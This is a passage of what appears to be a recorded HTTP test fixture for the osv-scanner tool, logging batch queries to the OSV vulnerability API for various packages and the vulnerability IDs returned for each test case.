"DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "22298" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/gh-annotations_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 263 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.24.4" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.24.4" } ] } headers: Content-Type: - application/json 
X-Test-Name: - TestCommand/go_packages_in_osv-scanner.json_format url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1549 body: | { "results": [ { "vulns": [ { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2025-3828", "modified": "2026-02-04T03:33:13.542630Z" }, { "id": "GO-2026-4339", "modified": "2026-02-04T04:20:19.626029Z" }, { "id": "GO-2026-4433", "modified": "2026-03-02T10:44:08.411132Z" } ] } ] } headers: Content-Length: - "1549" Content-Type: - application/json status: 200 OK code: 
200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/ignores_without_reason_should_be_explicitly_called_out url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1024 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/ignoring_.gitignore url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { 
"ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/json_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/nested_directories_are_checked_when_`--recursive`_is_passed url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - 
TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile_with_ignore url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 
proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_duplicate_PURLs url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", 
"modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 
content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1073 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_invalid_PURLs url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1073 host: api.osv.dev body: | { "queries": [ { "package": { 
"ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { 
"ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": 
"20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 
proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/output_format:_markdown_table url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1712 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "black" }, "version": "25.1.0" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "numpy" }, "version": "2.3.1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "2.2.24" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "numpy" }, "version": "2.3.1" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "flask-cors" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", 
"name": "pandas" }, "version": "0.23.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/requirements.txt_can_have_all_kinds_of_names url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4809 body: | { "results": [ { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-3936-cmfr-pm3m", "modified": "2026-03-16T16:44:03.077621Z" } ] }, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2gwj-7jmv-h26r", "modified": "2025-02-21T05:41:10.759178Z" }, { "id": "GHSA-53qw-q765-4fww", "modified": "2024-09-20T16:09:39.890846Z" }, { "id": 
"GHSA-6cw3-g6wv-c2xv", "modified": "2024-09-20T15:47:27.155401Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8c5j-9r9f-c6w8", "modified": "2025-02-21T05:29:59.213830Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-95rw-fx8r-36v6", "modified": "2024-09-20T15:47:46.984048Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-jrh2-hc4r-7jwx", "modified": "2024-09-20T12:22:54.101910Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "GHSA-v6rh-hp5x-86rv", "modified": "2024-11-19T05:35:04.095106Z" }, { "id": "GHSA-w24h-v9qh-8gxj", "modified": "2025-02-21T05:41:01.294618Z" }, { "id": "PYSEC-2021-439", "modified": "2023-12-06T01:01:41.266810Z" }, { "id": "PYSEC-2022-1", "modified": "2023-12-06T01:01:43.028018Z" }, { "id": "PYSEC-2022-19", "modified": "2023-12-06T01:01:58.226668Z" }, { "id": "PYSEC-2022-190", "modified": "2023-12-06T01:02:11.594317Z" }, { "id": "PYSEC-2022-191", "modified": "2023-12-06T01:02:11.666037Z" }, { "id": "PYSEC-2022-2", "modified": "2023-12-06T01:01:43.088680Z" }, { "id": "PYSEC-2022-20", "modified": "2023-12-06T01:02:02.697371Z" }, { "id": "PYSEC-2022-3", "modified": "2023-12-06T01:01:43.819827Z" } ] }, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": 
